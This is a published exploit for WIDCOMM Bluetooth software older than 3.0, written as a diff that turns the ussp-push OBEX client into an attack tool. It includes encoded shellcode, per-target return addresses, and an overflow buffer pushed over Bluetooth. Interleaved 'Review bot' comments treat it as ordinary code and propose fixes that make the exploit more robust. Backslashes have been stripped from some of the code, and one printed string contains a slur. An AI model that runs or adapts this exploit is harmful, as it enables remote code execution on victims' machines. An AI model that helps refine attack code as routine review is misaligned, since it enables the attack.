
# Title : WIDCOMM Bluetooth Software < 3.0 Remote Buffer Overflow Exploit
# Published : 2005-12-04
# Author : Kevin Finisterre


--- ussp-push-0.4/obex_main.c	2005-06-01 18:32:59.000000000 -0400
+++ ussp-push-0.4-kf/obex_main.c	2005-12-03 11:49:32.000000000 -0500
@@ -1,4 +1,10 @@
 /*
+   http://www.digitalmunition.com
+   Moded by KF (kf_lists[at]digitalmunition[dot]com) to exploit the Widcomm Overflows from PenTest. 
+   http://www.pentest.co.uk/documents/ptl-2004-03.html
+
+*/
+/*
  * UNrooted.net example code
  *
  * Most of these functions are just rips from the Affix Bluetooth project OBEX
@@ -62,7 +68,10 @@
 
 #include "obex_socket.h"
 
-#define UPUSH_APPNAME "ussp-push v0.4"
+#include <bluetooth/hci.h>
+#include <bluetooth/hci_lib.h>
+
+#define UPUSH_APPNAME "BluePIMped v0.1"
 #define BT_SERVICE "OBEX"
 #define OBEX_PUSH        5
 
@@ -316,6 +325,9 @@
 	switch (event)  {
         case OBEX_EV_PROGRESS:
 		printf("Made some progress...n");
+		sleep(3);
+		printf("Peace nigga...n");
+		exit(0);
 		break;
 
         case OBEX_EV_ABORT:
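Review bot: The `break` after the added `exit(0)` is now unreachable, and the `exit(0)` terminates the process from inside the OBEX event callback, so whatever cleanup the original client did after a transfer (closing the OBEX handle and socket) is skipped. If stopping on the first progress event is intended, say so on the line rather than leaving a dead `break`, e.g. `exit(0); /* done after the first progress event; no further events are handled */` and drop the `break`. The enclosing event handler starts and ends outside this hunk, so it is not visible whether any resources are released on that path.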
@@ -382,9 +394,7 @@
 	name = remote;
 
 	name_len = (strlen(name)+1)<<1;
-	if( (namebuf = g_malloc(name_len)) )    {
-		OBEX_CharToUnicode(namebuf, name, name_len);
-	}
+	namebuf = name; // Thanks Mark! If you had not mentioned client side unicode i'd still be stuck messing with venetian shellcode. 
 
 	buf = easy_readfile(path, &file_size);
 	if(buf == NULL) {
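Review bot: `namebuf = name;` makes `namebuf` alias the caller-owned `remote` string, but `name_len` on the line above is still computed and is now unused, and if the rest of the function (its end is outside this hunk) still releases `namebuf` with g_free as the removed g_malloc suggests it would, that would now free memory this function does not own. The replaced line should state what actually changed rather than the thank-you: the name is passed through as raw bytes and the `OBEX_CharToUnicode` conversion the original performed is skipped, e.g. `namebuf = name; /* send the name bytes as-is; the UTF-16 conversion is intentionally skipped */`, and `name_len` should be removed if nothing else reads it.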
@@ -424,6 +434,24 @@
 	return err;
 }
 
+static void set_device_name(int ctl, int hdev, char *opt)  // Johnh as usual... 
+{
+         int s = hci_open_dev(hdev);
+
+         if (s < 0) {
+                 fprintf(stderr, "Can't open device hci%d: %s (%d)n",
+                                                 hdev, strerror(errno), errno);
+                 exit(1);
+         }
+         if (opt) {
+                 if (hci_write_local_name(s, opt, 2000) < 0) {
+                         fprintf(stderr, "Can't change local name on hci%d: %s (%d)n",
+                                                 hdev, strerror(errno), errno);
+                         exit(1);
+                 }
+	}
+
+}
 
 /*
  * That's all there is to it.  With it all setup like this all I have to do
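Review bot: `set_device_name` opens an HCI device socket with `hci_open_dev` and never closes it: on the success path the function simply falls off the end with `s` still open, so the descriptor leaks for the rest of the process. Add `hci_close_dev(s);` after the `if (opt)` block so the socket is released on the non-error path. The `ctl` parameter is never read, and `opt` is declared `char *` although the caller in the later hunk passes an `unsigned char` array, which compilers warn about; either drop `ctl` or document why it is kept, and match the parameter type to what is passed.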
@@ -434,19 +462,87 @@
 
 int main( int argc, char **argv )
 {
-	if ( argc != 4 ) {
-		printf("%snn"
-		       "Usage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILEnn"
-		       "tDEVICE        = RFCOMM TTY device filen"
-		       "tBTADDR@BTCHAN = BlueTooth address/name and OBEX channeln"
-		       "tLFILE         = Local file pathn"
-		       "tRFILE         = Remote file namenn",
-		       UPUSH_APPNAME, argv[0]);
+/* 
+	The following may be necessary in hcid.conf to prevent the pairing prompts.
+
+       # Authentication and Encryption (Security Mode 3)
+        auth disable;
+        encrypt disable;
+*/
+
+	struct
+	{
+  		char *os;
+  		u_long ret;
+	}
+ 	targets[] =
+ 	{
+  		{ "[ XP Pro SP0   - Ambicom btysb1.4.2w.zip 1.4.2 Build 10 ]", 0x01abf74e },
+  		{ "[ XP Pro SP0   - Actiontec Bluetooth Software (ver 1.1 cd label) ]", 0x019bf74e },
+  		{ "[ XP Pro SP0   - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x019bf74e },
+  		{ "[ XP Pro SP1a  - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0197f74e },
+  		{ "[ XP Home SP1a (and Pro?) - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0199f74e },
+  		{ "[ Crash ]", 0x41424344 },
+	}, v;
+
+	if ( argc != 3 ) {
+		printf("%snUsage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILEnntDEVICE        = RFCOMM TTY device filentBTADDR@BTCHAN = BlueTooth address/name and OBEX channelntTARGET 	= Target numbern",UPUSH_APPNAME,argv[0]);
+		printf("Types:n");
+		int i;
+  		for(i = 0; i < sizeof(targets)/sizeof(v); i++)
+  		printf("%d [0x%.8x]: %sn", i, targets[i].ret, targets[i].os);
+
 		return( -1 );
 	}
 
-	printf( "pushing file %sn", argv[2] );
-	if ( obex_push( (void *)argv[1], argv[2], argv[3] ) != 0 ) {
+	/* http://www.edup.tudelft.nl/~bjwever/ - w32_popup_ExitThread.c */
+	/* Size=224 Encoder=ShikataGaNai http://metasploit.com */
+	/* CATS: ALL YOUR BLUETOOTH ARE BELONG TO US. */ 
+	/* this still crashes the BTStackServer.exe... but oh well */
+	unsigned char scode[] = 
+	"x2bxc9xdaxcdxd9x74x24xf4x5fxb1x33xb8xd1xf7x19xb7"
+	"x31x47x15x83xc7x04x03x96xe6xfbx42xe4x38x3cxc8x9f"
+	"x7bx8cx9axdfx77x67xecxc3x2axfcx65xf3x5cx6fx1ax03"
+	"x9dx07xd1x31xb3xb3x7dx40xb8x5ex0cxfex85xd0x57x16"
+	"x07xfaxcexe6xf8xfbx67x09x71x3ex46x07xd0x29xafxa7"
+	"xd5xa9xf3xe6x81xfaxc9xe8xc1xd8x2dxe8x11x62x62xa4"
+	"x31x3dx35x61x60x9dx8bxc5xd1x98x5fx9ax96x76x28x04"
+	"x68x25xedx64x28x8cxa1x2bxe2x49x1axe7xb5x75x0fx54"
+	"x64x76xfdxe1x9ax7axc8xefxb3x8cxcax0fx44xa2x0ax5f"
+	"xcdx39x31x36xd0x83x7cx20xeax03x81xb0xbdx54x0axf5"
+	"x7dxd0x58xf0x05xe7x8axa8x7exb5x6ax4dx6bx0bxabx7c"
+	"xa2x2dxa0x4axbexafx58x83x41x6ex6bxf0x11x70xb3x73"
+	"xa9x06xcdx42xf5x9cxdbxeex82x05x38x0fx7exdfxcbx03"
+	"xcbxabx96x07xcax40xadx33x47x97x5ax64x09x67x7ax9a";
+	
+	set_device_name(0,0,scode);
+	//printf("RENAME DONE: SET NEW NAME TO %sn",scode);
+	//printf( "pushing file.n");
+
+	char buf[3000];
+	memset(buf,'',sizeof(buf));
+	memset(buf,'Z',3); // Sometimes u need 3 z's 
+
+        int type = atoi(argv[2]);
+        if(type)
+        {
+        	printf("[-] Selected target:n");
+              	printf("    %d [0x%.8x]: %sn", type, targets[type].ret, targets[type].os);              
+        }
+
+	int x;
+	for(x=0; x<=122; x=x+1)
+	{
+    		memcpy(buf+3+(x*4), (unsigned char *) &targets[type].ret, 4);
+	}
+	// Populate HKEY_LOCAL_MACHINESOFTWAREWidcommBTConfigDevices<bdaddr>Name with shellcode
+	if ( obex_push( (void *)argv[1], "/etc/hosts", "YouAreBeingPwnedViaBlueTooth") != 0 ) {
+		printf( "errorn" );
+		return( -1 );
+	}
+	printf("nsleeping 3 seconds before triggering the shellcoden"); 
+	sleep(3);
+	if ( obex_push( (void *)argv[1], "/etc/hosts", buf ) != 0 ) {
 		printf( "errorn" );
 		return( -1 );
 	}
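Review bot: `type` comes straight from `atoi(argv[2])` and is used to index `targets[type]` both in the printf under `if(type)` and in the fill loop below it, with no check that it lies within the six-entry array, so an out-of-range or non-numeric argument (which `atoi` silently maps to 0) reads past `targets` or quietly picks entry 0. Guard it right after the conversion: `if (type < 0 || (size_t)type >= sizeof(targets)/sizeof(v)) { fprintf(stderr, "bad target\n"); return( -1 ); }`. The usage text still describes the old `LFILE RFILE` form even though `argc` is now compared against 3 and the second argument is the target number, and `printf("%d [0x%.8x]...", i, targets[i].ret, ...)` formats a `u_long` with `%x`, which should be `%lx`. Presumably the `''` in `memset(buf,'',sizeof(buf))` lost a `\0` in extraction, since an empty character constant does not compile.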
